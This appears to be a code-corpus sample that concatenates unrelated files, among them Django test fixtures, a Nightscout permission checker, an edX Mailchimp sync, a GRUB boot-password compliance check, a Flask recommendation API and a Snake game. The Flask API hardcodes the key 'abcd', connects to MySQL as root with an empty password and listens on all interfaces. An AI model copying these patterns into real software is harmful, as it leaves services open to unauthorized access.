strategy = Strategy.objects.get(name="StaticStrategyLogic")
mission = Mission.objects.create(name="Test mission 4")
mission_package = MissionPackages.objects.create(mission=mission, strategy=strategy, max_annotations=10)
mission_package.max_annotations = 7
mission_package.save()
task = Task.objects.create(mission=mission, name="Task 1", strategy=strategy)
template = ItemTemplate.objects.create(name="Test template")
first_field = ItemTemplateField.objects.create(name="first", widget="TextLabel")
template.fields.add(first_field)
annotation_field = ItemTemplateField.objects.create(name="output", widget="TextLabel",
required=True, editable=True, feedback=True)
template.fields.add(annotation_field)
FeedbackScoreField.register_values()
FeedbackField.register_values()
feedback = Feedback.objects.create(task=task)
feedback.fields.add(FeedbackField.objects.get(name="VoteRanking"))
feedback.score_fields.add(FeedbackScoreField.objects.get(name="VotingScore"))
documents = {}
for i in range(len(data)):
documents[i] = Package.objects.create(name="Doc{}".format(i), parent=mission_package)
users = {}
for i in range(14):
users[i] = EndWorker.objects.create_user("<EMAIL>),
"password",
username="user_{}".format(i))
users[i].stats # creates user stast
users[i].get_mission_stats(mission.id)
for i, row in enumerate(data):
item = Item.objects.create(task=task, template=template, package=documents[i],
data={first_field.name: i}, order=i)
counter = 0
for j, count in enumerate(row):
for _ in range(count):
Annotation.objects.create(item=item,
user=users[counter],
data={annotation_field.name: j})
counter += 1
for annotation in Annotation.objects.all():
AnnotationController().process(annotation)
update_user_stats()
@pytest.fixture
@pytest.mark.django_db
def two_missions(tasks_items, user1):
item1 = Item.objects.filter(task__name="Task 1").first()
item4 = Item.objects.filter(task__name="Task 4").first()
add_annotation(item1, user1, "A")
add_annotation(item4, user1, "A")
| StarcoderdataPython |
6570925 | #!/usr/bin/env python3
# pip3 install requests
import requests
import json
import logging
import argparse
import configparser
import sys
import re
from urllib.parse import urlsplit
import time
nightscout_host=None # will be read from ns.ini
api_secret=None # will be read from ns.ini
token_secret=None # will be read from ns.ini
token_dict={}
token_dict["exp"]=-1
auth_headers={}
def init(args):
if args.verbose:
logging.basicConfig(level=logging.DEBUG, stream=sys.stdout, format='%(asctime)s %(levelname)s %(message)s')
else:
logging.basicConfig(level=logging.INFO, stream=sys.stdout, format='%(asctime)s %(levelname)s %(message)s')
def parse_ns_ini(filename):
global nightscout_host, api_secret, token_secret
logging.debug("Parsing %s" % filename)
config = configparser.ConfigParser()
try:
with open(filename) as f:
config.readfp(f)
except IOError:
logging.error("Could not open %s" % filename)
sys.exit(1)
for section in config.sections():
if section=='device "ns"':
for option in config.options(section):
if option=='args':
argsline=config.get(section, option).split(" ")
logging.debug("args=%s" % argsline)
if argsline[0]!="ns":
logging.error("Invalid ini file. First argument should be 'ns'")
sys.exit(1)
nightscout_host=argsline[1]
api_secret=argsline[2]
if nightscout_host==None:
logging.error("Nightscout set not found in %s'"%filename)
sys.exit(1)
if not api_secret.startswith('token='):
logging.error("API_SECRET in %s should start with 'token='"%filename)
sys.exit(1)
p = re.compile("^token=(?P<token>[a-z0-9_]+-[a-z0-9]{16}).*")
#p = re.compile("token=(?P<token>.*)")
m = p.match(api_secret)
if m:
token_secret=m.group('token') # extra token from API_SECRET field
else: # did not match regexp
logging.error("Token is not valid in %s" % filename)
sys.exit(1)
def get_nightscout_authorization_token():
global nightscout_host, token_secret, token_dict, auth_headers
logging.debug("get_nightscout_authorization_token")
try:
r = requests.get(nightscout_host+"/api/v2/authorization/request/"+token_secret)
if r.status_code==200:
# save authentication token to a dict
token_dict=r.json()
logging.debug("token_dict=%s" % token_dict)
logging.debug("authorization valid until @%d " % token_dict['exp'])
logging.info("Succesfully got Nightscout authorization token")
else:
logging.error("status_code: %d. Response: %s" % (r.status_code, r.text))
logging.error("Could not connect to Nightscout. Please check permissions")
sys.exit(1)
except Exception as e:
logging.error("Could not get_nightscout_authorization_token")
logging.debug("Exception: %s" %e)
sys.exit(1)
def startup_checks(args):
parse_ns_ini(args.nsini)
logging.info("Nightscout host: %s" % nightscout_host)
get_nightscout_authorization_token()
def check_permissions():
global token_dict
pg=token_dict['permissionGroups'][0]
if pg==["*"]: # admin role
logging.warning("The use of the admin role for token based authentication is not recommended, see https://openaps.readthedocs.io/en/master/docs/walkthrough/phase-1/nightscout-setup.md#switching-from-api_secret-to-token-based-authentication-for-your-rig")
else:
missing=[]
for perm in ["api:treatments:read", "api:treatments:create", "api:treatments:read", "api:treatments:create", "api:devicestatus:read", "api:devicestatus:create"]:
logging.debug("Checking %s" % perm)
if perm not in pg:
missing.append(perm)
if len(missing)>0:
logging.error("The following permissions are missing in Nightscout: %s" % missing)
logging.error("Please follow instructions at https://openaps.readthedocs.io/en/master/docs/walkthrough/phase-1/nightscout-setup.md#switching-from-api_secret-to-token-based-authentication-for-your-rig")
sys.exit(1)
logging.info("All permissions in Nightscout are ok")
if __name__ == '__main__':
try:
parser = argparse.ArgumentParser(description='Checks permissions in Nightscout based on your ns.ini')
parser.add_argument('-v', '--verbose', action="store_true", help='increase output verbosity')
parser.add_argument('--nsini', type=str, help='Path to ns.ini' , default='./ns.ini')
args = parser.parse_args()
init(args)
startup_checks(args)
check_permissions()
except Exception:
logging.exception("Exception in %s" % __name__)
| StarcoderdataPython |
1717056 | ########################################################
# <NAME> - drigols #
# Last update: 07/11/2021 #
########################################################
class Person:
def __init__(self, nome, idade=None, numero_olhos = 2, naturalidade = "Brazil"):
self.nome = nome
self.idade = idade
self.numero_olhos = numero_olhos
self.naturalidade = naturalidade
if __name__ == "__main__":
p = Person('Rodrigo')
print(p.__dict__)
| StarcoderdataPython |
1764553 | """
Synchronizes a mailchimp list with the students of a course.
"""
import itertools
import logging
import math
import random
from collections import namedtuple
from itertools import chain
from django.core.management.base import BaseCommand
from mailsnake import MailSnake
from opaque_keys.edx.keys import CourseKey
from common.djangoapps.student.models import UserProfile, unique_id_for_user
BATCH_SIZE = 15000
# If you try to subscribe with too many users at once
# the transaction times out on the mailchimp side.
SUBSCRIBE_BATCH_SIZE = 1000
log = logging.getLogger('edx.mailchimp')
FIELD_TYPES = {'EDX_ID': 'text'}
class Command(BaseCommand):
"""
Synchronizes a mailchimp list with the students of a course.
"""
help = 'Synchronizes a mailchimp list with the students of a course.'
def add_arguments(self, parser):
parser.add_argument('--key',
required=True,
help='mailchimp api key')
parser.add_argument('--list',
dest='list_id',
required=True,
help='mailchimp list id')
parser.add_argument('--course',
dest='course_id',
required=True,
help='edx course_id')
parser.add_argument('--segments',
dest='num_segments',
type=int,
default=0,
help='number of static random segments to create')
def handle(self, *args, **options):
"""Synchronizes a mailchimp list with the students of a course."""
key = options['key']
list_id = options['list_id']
course_id = options['course_id']
num_segments = options['num_segments']
log.info('Syncronizing email list for %s', course_id)
mailchimp = connect_mailchimp(key)
subscribed = get_subscribed(mailchimp, list_id)
unsubscribed = get_unsubscribed(mailchimp, list_id)
cleaned = get_cleaned(mailchimp, list_id)
non_subscribed = unsubscribed.union(cleaned)
enrolled = get_enrolled_students(course_id)
exclude = subscribed.union(non_subscribed)
to_subscribe = get_student_data(enrolled, exclude=exclude)
tag_names = set(chain.from_iterable(list(d.keys()) for d in to_subscribe))
update_merge_tags(mailchimp, list_id, tag_names)
subscribe_with_data(mailchimp, list_id, to_subscribe)
enrolled_emails = set(enrolled.values_list('user__email', flat=True))
non_enrolled_emails = list(subscribed.difference(enrolled_emails))
unsubscribe(mailchimp, list_id, non_enrolled_emails)
subscribed = subscribed.union({d['EMAIL'] for d in to_subscribe})
make_segments(mailchimp, list_id, num_segments, subscribed)
def connect_mailchimp(api_key):
"""
Initializes connection to the mailchimp api
"""
mailchimp = MailSnake(api_key)
result = mailchimp.ping()
log.debug(result)
return mailchimp
def verify_list(mailchimp, list_id, course_id):
"""
Verifies that the given list_id corresponds to the course_id
Returns boolean: whether or not course_id matches list_id
"""
lists = mailchimp.lists(filters={'list_id': list_id})['data']
if len(lists) != 1:
log.error('incorrect list id')
return False
list_name = lists[0]['name']
log.debug('list name: %s', list_name)
# check that we are connecting to the correct list
parts = course_id.replace('_', ' ').replace('/', ' ').split()
count = sum(1 for p in parts if p in list_name)
if count < 3:
log.info(course_id)
log.info(list_name)
log.error('course_id does not match list name')
return False
return True
def get_student_data(students, exclude=None):
"""
Given a QuerySet of Django users, extracts id, username, and is_anonymous data.
Excludes any users provided in the optional `exclude` set.
Returns a list of dictionaries for each user, where the dictionary has keys
'EMAIL', 'FULLNAME', and 'EDX_ID'.
"""
# To speed the query, we won't retrieve the full User object, only
# two of its values. The namedtuple simulates the User object.
FakeUser = namedtuple('Fake', 'id username is_anonymous')
exclude = exclude if exclude else set()
def make(svalue):
"""
Given a User value entry `svalue`, extracts the student's email and fullname,
and provides a unique id for the user.
Returns a dictionary with keys 'EMAIL', 'FULLNAME', and 'EDX_ID'.
"""
fake_user = FakeUser(svalue['user_id'], svalue['user__username'], lambda: True)
entry = {
'EMAIL': svalue['user__email'],
'FULLNAME': svalue['name'].title(),
'EDX_ID': unique_id_for_user(fake_user)
}
return entry
fields = 'user__email', 'name', 'user_id', 'user__username'
values = students.values(*fields)
# TODO: Since `students` is a QuerySet, can we chain a filter here that would be more
# performant than calling a lambda for every user?
exclude_func = lambda s: s['user__email'] in exclude
return [make(s) for s in values if not exclude_func(s)]
def get_enrolled_students(course_id):
"""
Given a course_id, returns a QuerySet of all the active students
in the course.
"""
objects = UserProfile.objects
course_key = CourseKey.from_string(course_id)
students = objects.filter(user__courseenrollment__course_id=course_key,
user__courseenrollment__is_active=True)
return students
def get_subscribed(mailchimp, list_id):
"""Returns a set of email addresses subscribed to `list_id`"""
return get_members(mailchimp, list_id, 'subscribed')
def get_unsubscribed(mailchimp, list_id):
"""Returns a set of email addresses that have unsubscribed from `list_id`"""
return get_members(mailchimp, list_id, 'unsubscribed')
def get_cleaned(mailchimp, list_id):
"""
Returns a set of email addresses that have been cleaned from `list_id`
These email addresses may be invalid or have caused bounces, so you don't want
to re-add them back to the list.
"""
return get_members(mailchimp, list_id, 'cleaned')
def get_members(mailchimp, list_id, status):
"""
Given a mailchimp list id and a user status to filter on, returns all
members of the mailchimp list with that status.
Returns a set of email addresses.
"""
mc_get_members = mailchimp.listMembers
members = set()
for page in itertools.count():
response = mc_get_members(id=list_id,
status=status,
start=page,
limit=BATCH_SIZE)
data = response.get('data', [])
if not data:
break
members.update(d['email'] for d in data)
return members
def unsubscribe(mailchimp, list_id, emails):
"""
Batch unsubscribe the given email addresses from the list represented
by `list_id`
"""
batch_unsubscribe = mailchimp.listBatchUnsubscribe
result = batch_unsubscribe(id=list_id,
emails=emails,
send_goodbye=False,
delete_member=False)
log.debug(result)
def update_merge_tags(mailchimp, list_id, tag_names):
"""
This function is rather inscrutable. Given tag_names, which
in this code seems to be a list of ['FULLNAME', 'EMAIL', 'EDX_ID'],
we grab tags from the mailchimp list, then we verify tag_names has
'FULLNAME' and 'EMAIL' present, we get more data from mailchimp, then
sync the variables up to mailchimp using `listMergeVarAdd`.
The purpose of this function is unclear.
"""
mc_vars = mailchimp.listMergeVars(id=list_id)
mc_names = {v['name'] for v in mc_vars}
mc_merge = mailchimp.listMergeVarAdd
tags = [v['tag'] for v in mc_vars]
for name in tag_names:
tag = name_to_tag(name)
# verify FULLNAME is present
# TODO: Why is this under the for loop? It does nothing with the loop
# variable and seems like things would work if this was executed before or
# after the loop.
if 'FULLNAME' not in tags:
result = mc_merge(id=list_id,
tag='FULLNAME',
name='<NAME>',
options={'field_type': 'text',
'public': False})
tags.append('FULLNAME')
log.debug(result)
# add extra tags if not present
if name not in mc_names and tag not in ['EMAIL', 'FULLNAME']:
ftype = FIELD_TYPES.get(name, 'number')
result = mc_merge(id=list_id,
tag=tag,
name=name,
options={'field_type': ftype,
'public': False})
tags.append(tag)
log.debug(result)
def subscribe_with_data(mailchimp, list_id, user_data):
"""
Given user_data in the form of a list of dictionaries for each user,
where the dictionary has keys 'EMAIL', 'FULLNAME', and 'EDX_ID', batch
subscribe the users to the given `list_id` via a Mailchimp api method.
Returns None
"""
format_entry = lambda e: {name_to_tag(k): v for k, v in e.items()}
formated_data = list(format_entry(e) for e in user_data)
# send the updates in batches of a fixed size
for batch in chunk(formated_data, SUBSCRIBE_BATCH_SIZE):
result = mailchimp.listBatchSubscribe(id=list_id,
batch=batch,
double_optin=False,
update_existing=True)
log.debug(
"Added: %s Error on: %s", result['add_count'], result['error_count']
)
def make_segments(mailchimp, list_id, count, emails):
"""
Segments the list of email addresses `emails` into `count` segments,
if count is nonzero.
For unknown historical reasons, lost to the winds of time, this is done with
a random order to the email addresses.
First, existing 'random_' mailchimp segments are deleted.
Then, the list of emails (the whole, large list) is shuffled.
Finally, the shuffled emails are chunked into `count` segments and re-uploaded
to mailchimp as 'random_'-prefixed segments.
"""
if count > 0:
# reset segments
segments = mailchimp.listStaticSegments(id=list_id)
for seg in segments:
if seg['name'].startswith('random'):
mailchimp.listStaticSegmentDel(id=list_id, seg_id=seg['id'])
# shuffle and split emails
emails = list(emails)
random.shuffle(emails) # Why do we do this?
chunk_size = int(math.ceil(float(len(emails)) / count))
chunks = list(chunk(emails, chunk_size))
# create segments and add emails
for seg in range(count):
name = f'random_{seg:002}'
seg_id = mailchimp.listStaticSegmentAdd(id=list_id, name=name)
for batch in chunk(chunks[seg], BATCH_SIZE):
mailchimp.listStaticSegmentMembersAdd(
id=list_id,
seg_id=seg_id,
batch=batch
)
def name_to_tag(name):
"""
Returns sanitized str `name`: no more than 10 characters,
with spaces replaced with `_`
"""
if len(name) > 10:
name = name[:10]
return name.replace(' ', '_').strip()
def chunk(elist, size):
"""
Generator. Yields a list of size `size` of the given list `elist`,
or a shorter list if at the end of the input.
"""
for i in range(0, len(elist), size):
yield elist[i:i + size]
| StarcoderdataPython |
3234540 | """
``$ articlequality extract_text -h``
::
Extracts text & metadata for labelings using XML dumps.
Usage:
extract_text <dump-file>... [--labelings=<path>] [--output=<path>]
[--threads=<num>] [--verbose]
extract_text -h | --help
Options:
-h --help Show this screen.
<dump-file> An XML dump file to process
--labelings=<name> The path to a file containing labeling events.
[default: <stdin>]
--output=<path> The path to a file to dump observations to
[default: <stdout>]
--threads=<num> If a collection of files are provided, how many
processor threads should be prepare?
[default: <cpu_count>]
--verbose Prints dots to <stderr>
"""
import logging
import os.path
import re
import sys
from itertools import groupby
from multiprocessing import cpu_count
import docopt
import mwtypes
import mwxml
from revscoring.utilities.util import dump_observation, read_observations
def main(argv=None):
args = docopt.docopt(__doc__, argv=argv)
dump_paths = args['<dump-file>']
if args['--labelings'] == "<stdin>":
labelings = read_observations(sys.stdin)
else:
path = os.path.expanduser(args['--labelings'])
labelings = read_observations(open(path))
grouped_labelings = groupby(labelings, key=lambda l: l['page_title'])
page_labelings = {title: sorted(list(labs), key=lambda l: l['timestamp'])
for title, labs in grouped_labelings}
if args['--threads'] == "<cpu_count>":
threads = cpu_count()
else:
threads = int(args['--threads'])
if args['--output'] == "<stdout>":
output = sys.stdout
else:
output = open(os.path.expanduser(args['--output']), "w")
verbose = args['--verbose']
run(dump_paths, page_labelings, output, threads, verbose=verbose)
def run(dump_paths, page_labelings, output, threads, verbose=False):
logging.basicConfig(
level=logging.DEBUG if verbose else logging.WARNING,
format='%(asctime)s %(levelname)s:%(name)s -- %(message)s'
)
if len(dump_paths) == 0:
labelings = extract_text(mwxml.Dump.from_file(sys.stdin),
page_labelings, verbose=verbose)
else:
labelings = mwxml.map(lambda d, p:
extract_text(d, page_labelings, verbose),
dump_paths, threads=threads)
for labeling in labelings:
dump_observation(labeling, output)
def extract_text(dump, page_labelings, verbose=False):
"""
Extracts article text and metadata for labelings from an XML dump.
:Parameters:
dump : :class:`mwxml.Dump`
The XML dump file to extract text & metadata from
labelings : `iterable`(`dict`)
A collection of labeling events to add text to
verbose : `bool`
Print dots and stuff
:Returns:
An `iterator` of labelings augmented with 'page_id', 'rev_id' and
'text'. Note that labelings of articles that can't be looked up will
not be included.
"""
for page in dump:
if page.namespace == 0 and page.title in page_labelings:
if verbose:
sys.stderr.write("\n{0}: ".format(page.title))
sys.stderr.flush()
labelings = page_labelings[page.title]
last_revision = None
for revision in page:
while last_revision is not None and \
len(labelings) > 0 and \
revision.timestamp > \
mwtypes.Timestamp(labelings[0]['timestamp']):
labeling = labelings.pop()
labeling['page_id'] = page.id
labeling['rev_id'] = last_revision.id
if not_an_article(last_revision.text):
labeling['text'] = None
else:
labeling['text'] = last_revision.text
yield labeling
if verbose:
sys.stderr.write("t")
sys.stderr.flush()
# Don't update last_revision if the text was deleted
if revision.text is not None:
last_revision = revision
REDIRECT_RE = re.compile("#redirect", re.I)
def not_an_article(text):
return (text is None or
len(text) < 50 or
REDIRECT_RE.match(text))
| StarcoderdataPython |
5076950 | from scanner.const import os
from scanner.types import BaseContol, is_item_detected
from scanner.transports import get_transport
class Control(BaseContol, control_number=7):
file_paths = (
'/boot/grub/menu.lst',
'/boot/grub2/menu.lst',
'/boot/grub/grub.cfg',
'/boot/grub2/grub.cfg',
'/boot/grub/grub.conf',
'/boot/grub2/grub.conf',
'/etc/grub.conf'
)
password_strings = (
'set <PASSWORD>',
'password'
)
def prerequisite(self):
return is_item_detected(os.LINUX)
def check(self):
transport = get_transport('unix')
boot_configs = {}
for file in self.file_paths:
result = transport.get_file_content(file)
if result.ExitStatus != 0:
continue
boot_configs[file] = result.Output
if not boot_configs:
self.control.not_applicable()
is_compliance = False
results = []
for file_name, content in boot_configs.items():
if not content:
continue
lines = [
f'{file_name}:{number}:{line}'
for number, line in enumerate(
map(str.strip, content.splitlines()),
1
)
if line.startswith(self.password_strings)
]
if not lines:
continue
results.extend(lines)
is_compliance = True
result = '\n'.join(results)
if is_compliance:
self.control.compliance(
result=result
)
else:
self.control.not_compliance(
result='The password is not set up'
)
| StarcoderdataPython |
5101323 | <reponame>marvinhere/bookrecommendation
import flask
from sqlalchemy import create_engine
import pandas as pd
import numpy as np
#import operator
import mysql.connector as sql
from flask import request, jsonify
#from operations import *
import joblib
import json
import array as arr
import random
import sys
import recommendations as recommend
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics.pairwise import cosine_similarity
app = flask.Flask(__name__)
app.config["DEBUG"] = False
# Create some test data for our catalog in the form of a list of dictionaries.
@app.route('/', methods=['GET'])
def home():
return '''<h1>Distant Reading Archive</h1>
<p></p>'''
# A route to return all of the available entries in our catalog.
@app.route('/api/v1/resources/books/all', methods=['GET'])
def api_all():
return jsonify(books)
@app.route('/transform-cover',methods=['GET'])
def api():
apikey = request.args.get('apikey')
#api password
if apikey == 'abcd':
MYSQL_USER = 'root'
MYSQL_PASSWORD = ''
MYSQL_HOST_IP = '127.0.0.1'
MYSQL_PORT = '3306'
MYSQL_DATABASE = 'srlbcr'
engine = create_engine('mysql+mysqlconnector://'+MYSQL_USER+':'+MYSQL_PASSWORD+'@'+MYSQL_HOST_IP+':'+MYSQL_PORT+'/'+MYSQL_DATABASE, echo=False)
dbConnection = engine.connect()
df = pd.read_sql("SELECT books.id, books.title,books.summary, GROUP_CONCAT(DISTINCT genres.genre SEPARATOR ' ') as genres, GROUP_CONCAT(DISTINCT c_designs.name SEPARATOR ' ') as covers FROM books INNER JOIN book_genres ON book_genres.book_id = books.id INNER JOIN genres ON book_genres.genre_id=genres.id INNER JOIN book_covers ON books.id=book_covers.book_id INNER JOIN c_designs ON book_covers.design_id=c_designs.id GROUP BY books.id", dbConnection)
df['cover'] = recommend.getImportantFeatures(df)
data = recommend.dataVectorized(df['cover'])
list = df[['id']].to_dict()
joblib.dump(data, "vector-cover.pkl")
joblib.dump(list['id'],"ids.pkl")
message =['Ok']
return jsonify(list["id"])
else:
message =['Error']
return jsonify(message)
@app.route('/recommendation-cover',methods=['GET'])
def recommendations():
apikey = request.args.get('apikey')
data_test_id = request.args.get('data')
k = request.args.get('k')
#data_test_id es el id a analizar
if apikey == 'abcd':
#obtener datos de entrenamiento de archivo vector-cover
train_data = joblib.load("vector-cover.pkl")
#obtener ids de archivo ids
ids_data = joblib.load("ids.pkl")
recom = recommend.getRecommendations(ids_data,train_data,data_test_id,int(k))
return jsonify(recom)
@app.route('/recommendation-summary',methods=['GET'])
def recomsummary():
apikey = request.args.get('apikey')
data_test_id = request.args.get('data')
k = request.args.get('k')
if apikey == 'abcd':
if data_test_id=='none':
abort(404)
else:
vectorizer = joblib.load("vector-summary.pkl")
ids_data = joblib.load("ids.pkl")
recom = recommend.getRecommendations(ids_data,vectorizer,data_test_id,int(k))
return jsonify(recom)
@app.route('/transform-summary',methods=['GET'])
def apisummary():
apikey = request.args.get('apikey')
if apikey == 'abcd':
MYSQL_USER = 'root'
MYSQL_PASSWORD = ''
MYSQL_HOST_IP = '127.0.0.1'
MYSQL_PORT = '3306'
MYSQL_DATABASE = 'srlbcr'
engine = create_engine('mysql+mysqlconnector://'+MYSQL_USER+':'+MYSQL_PASSWORD+'@'+MYSQL_HOST_IP+':'+MYSQL_PORT+'/'+MYSQL_DATABASE, echo=False)
dbConnection = engine.connect()
df = pd.read_sql("SELECT books.id, books.title,books.summary FROM books", dbConnection)
#df['cover'] = getImportantFeatures(df)
stop_words = frozenset(["a", "ante","bajo","con","de","desde","durante","hacia","hasta","por","para"])
#data = dataVectorized(df['summary'],'array')
data = recommend.dataVectorizedSummary(df['summary'],stop_words)
#data = df['cover'].head().to_html()
joblib.dump(data, "vector-summary.pkl")
message =['Ok']
return jsonify(message)
else:
message =['Error']
return jsonify(message)
app.run(host='0.0.0.0', port=5000)
| StarcoderdataPython |
5034652 | <reponame>BrenoNAlmeida/free-python-games
"""Snake, classic arcade game.
Exercises
1. How do you make the snake faster or slower?
2. How can you make the snake go around the edges?
3. How would you move the food?
4. Change the snake to respond to arrow keys.
1. Como você deixa a cobra mais rápida ou mais lenta? FEITO
2. Como você pode fazer a cobra contornar as bordas?
3. Como você moveria a comida?
4. Mude a cobra para responder às teclas de seta FEITO
"""
from turtle import *
from random import randrange
from freegames import square, vector
food = vector(0, 0) #posição inicial da comida
snake = [vector(10, 0)]#posição inicial da cobra
aim = vector(0,-10) # velocidade/direção da cobra
def change(x, y):
"Change snake direction."#"Mudar a direção da cobra."
aim.x = x
aim.y = y
def inside(head):
"Return True if head inside boundaries."#"Retorne True se a cabeça estiver dentro dos limites."
return -200 < head.x < 190 and -200 < head.y < 190
def move():
"Move snake forward one segment." #Mova a cobra um segmento para frente
head = snake[-1].copy()
head.move(aim)
if not inside(head) or head in snake: # caso a cobra encoste nas bordas
square(head.x, head.y, 9, 'red')# desenha um dradrado vermelho
update()
return
snake.append(head) #adiciona um quadrado na direção aim no vetor snake
if head == food:
print('Snake:', len(snake))
food.x = randrange(-15, 15) * 10 #novo X da comida no intervalo determinado
food.y = randrange(-15, 15) * 10 #novo Y da comida no intervalo determinado
else:
snake.pop(0) # remove o quadrado da posição anterior do vetor snake
clear()
#tamanho do corpo da cobra em relação ao vetor snake
for body in snake:
square(body.x, body.y, 9, 'black')
#tamanho da comida
square(food.x, food.y, 9, 'green')
update()
ontimer(move, 100)
setup(420, 420, 370, 0)
hideturtle()
tracer(False)
listen()
onkey(lambda: change(10, 0), 'Right')
onkey(lambda: change(-10, 0), 'Left')
onkey(lambda: change(0, 10), 'Up')
onkey(lambda: change(0, -10), 'Down')
move()
done() | StarcoderdataPython |
11242780 | <reponame>astromark/lacewing
import numpy as np
#from mpl_toolkits.mplot3d import Axes3D
from matplotlib import pyplot
#from matplotlib import cm
from matplotlib.patches import Ellipse
from matplotlib.patches import Polygon
from matplotlib import patches
from matplotlib import _png
import kinematics
import ellipse
import astrometry
import lacewing
import sys
from astropy.io import ascii
# Normally, matplotlib just builds up a list of plot elements until you
# call savefig(), when it renders them all at once. That uses a LOT
# of memory. This function replaces savefig() with something that plots
# every element as it comes in.
def save(fig,filename):
#We have to work around 'fig.canvas.print_png', etc calling 'draw'
renderer = fig.canvas.renderer
with open(filename,'w') as outfile:
_png.write_png(renderer._renderer,outfile,fig.dpi)
def traceback(argv=None):
if argv is None:
argv = sys.argv
mgpname = argv[2]
method = argv[3]
#If user gives positive values for ages assume they meant to give negative values
mgpage = -1*np.abs(np.float(argv[4]))
mgpage2 = -1*np.abs(np.float(argv[5]))
timespan = -1*np.abs(np.float(argv[6]))
timestep = -0.1
n_int = int(1000)
full_timespan = -1*np.abs(np.float(argv[7])) #-800
name,coord,era,edec,pmra,epmra,pmdec,epmdec,rv,erv,plx,eplx,note = lacewing.csv_loader(argv[1])
# How many stars are we fitting?
good_stars = [x for x in xrange(len(coord)) if ((pmra[x] is not None) & (pmdec[x] is not None) & (plx[x] is not None) & (rv[x] is not None))]
n_stars = len(good_stars)
print 'Number of stars in solution: {0:}'.format(n_stars)
# it saves time and memory to make arrays in advance, even in python
# Set dtype=np.float32 to save memory
mgp_x = np.zeros((n_stars,n_int,np.int(np.ceil(full_timespan/timestep))),dtype=np.float32)
mgp_y = np.zeros((n_stars,n_int,np.int(np.ceil(full_timespan/timestep))),dtype=np.float32)
mgp_z = np.zeros((n_stars,n_int,np.int(np.ceil(full_timespan/timestep))),dtype=np.float32)
# These are for the 3D movie version
mgp_size = []
#mgp_color = []
mgp_n = []
n = 0
print " # Name RA DEC Dist. pmRA pmDEC RV"
for i in good_stars:
print '({0:2d}) {1:16} {2:08.4f} {3:+07.4f} {4:6.2f} {5:+.4f} {6:+.4f} {7:+6.2f}'.format(i,name[i],coord[i].ra.degree,coord[i].dec.degree,1/plx[i],pmra[i],pmdec[i],rv[i])
###############################################################
### We now have the particulars about one star. We are now ###
### going to run I monte carlo iterations through the ###
### specified traceback method. The traceback is going to ###
### compute UVW points and run them back in time. We could ###
### then fit an ellipse to this star and save only the ###
### ellipse parameters, but then information would be lost ###
### (or need to be re-created) when we want to determine ###
### the shape of the moving group itself. Instead, we'll ###
### save and use every single monte carlo iteration. ###
###############################################################
if method == 'ballistic':
px,py,pz = kinematics.ballistic(coord[i].ra.degree,era[i],coord[i].dec.degree,edec[i],1/plx[i],eplx[i]/(plx[i]**2),pmra[i],epmra[i],pmdec[i],epmdec[i],rv[i],erv[i],full_timespan,timestep,n_int)
elif method == 'epicyclic':
px,py,pz = kinematics.epicyclic(coord[i].ra.degree,era[i],coord[i].dec.degree,edec[i],1/plx[i],eplx[i]/(plx[i]**2),pmra[i],epmra[i],pmdec[i],epmdec[i],rv[i],erv[i],full_timespan,timestep,n_int)
elif method == 'potential':
px,py,pz = kinematics.potential(coord[i].ra.degree,era[i],coord[i].dec.degree,edec[i],1/plx[i],eplx[i]/(plx[i]**2),pmra[i],epmra[i],pmdec[i],epmdec[i],rv[i],erv[i],full_timespan,timestep,n_int)
# store these iterations
mgp_x[n] = px
mgp_y[n] = py
mgp_z[n] = pz
mgp_n.append(name[i])
#mgp_color.extend([color]*n_int)
n = n+1
# remove spaces from name - helps with programming later on
mgpname = mgpname.replace(' ', '_')
################################################
### At this point in the program, we have ###
### an NxIxT grid of positions constituting ###
### the positions of I iterations of N stars ###
### at T times. Now we must fit ellipses to ###
### those values at every time T. ###
################################################
# AR 2014.0319: Based on an idea from <NAME>, rather than calculating the full tracebacks of n*1000 stars over X Myr, I'm going to calculate 1000 tracebacks of n stars over X Myr.
mgp_x = np.asarray(mgp_x,dtype=np.float32)
mgp_y = np.asarray(mgp_y,dtype=np.float32)
mgp_z = np.asarray(mgp_z,dtype=np.float32)
times = np.arange(0,full_timespan,timestep)
## output positions of individual stars as a function of time.
#for s in range(len(times)):
# outfile = open("mgp_{0:}_{1:}_{2:}.csv".format(mgpname,method,times[s]),"wb")
# outfile.write("Name,X,Y,Z,A,B,C,XY,XZ,YZ\n")
# for t in range(len(mgp_x)):
# obj = ellipse.fitellipse(mgp_x[t,:,s],mgp_y[t,:,s],mgp_z[t,:,s])
#
# outfile.write("{0:}, {1: 12.8f}, {2: 12.8f}, {3: 12.8f}, {4: 12.8f}, {5: 12.8f}, {6: 12.8f}, {7: 12.8f}, {8: 12.8f}, {9: 12.8f}\n".format(mgp_n[t],obj['x'],obj['y'],obj['z'],obj['a'],obj['b'],obj['c'],obj['xy'],obj['xz'],obj['yz']))
# outfile.close()
mgpmaster = []
outfile = open("Moving_Group_{0:}_{1:}.dat".format(mgpname,method),"wb")
outfile.write("Time X eX Y eY Z eZ A eA B eB C eC XY eXY XZ eXZ YZ eYZ\n")
print('Tracing back the stellar orbits...')
for k in xrange(len(times)):
objlist = []
for j in xrange(n_int):
# this is one ellipse per monte carlo iteration
obj = ellipse.fitellipse(mgp_x[:,j,k],mgp_y[:,j,k],mgp_z[:,j,k])
objlist.append(obj)
x = np.mean([objlist[m]['x'] for m in range(n_int)])
y = np.mean([objlist[m]['y'] for m in range(n_int)])
z = np.mean([objlist[m]['z'] for m in range(n_int)])
xy = np.mean([objlist[m]['xy'] for m in range(n_int)])
xz = np.mean([objlist[m]['xz'] for m in range(n_int)])
yz= np.mean([objlist[m]['yz'] for m in range(n_int)])
a = np.mean([objlist[m]['a'] for m in range(n_int)])
b = np.mean([objlist[m]['b'] for m in range(n_int)])
c = np.mean([objlist[m]['c'] for m in range(n_int)])
ex = np.std([objlist[m]['x'] for m in range(n_int)],ddof=1)
ey = np.std([objlist[m]['y'] for m in range(n_int)],ddof=1)
ez = np.std([objlist[m]['z'] for m in range(n_int)],ddof=1)
exy = np.std([objlist[m]['xy'] for m in range(n_int)],ddof=1)
exz = np.std([objlist[m]['xz'] for m in range(n_int)],ddof=1)
eyz= np.std([objlist[m]['yz'] for m in range(n_int)],ddof=1)
ea = np.std([objlist[m]['a'] for m in range(n_int)],ddof=1)
eb = np.std([objlist[m]['b'] for m in range(n_int)],ddof=1)
ec = np.std([objlist[m]['c'] for m in range(n_int)],ddof=1)
# We're re-saving a dictionary of one ellipse per TIMESTEP so that we can make a 3D plot of it later.
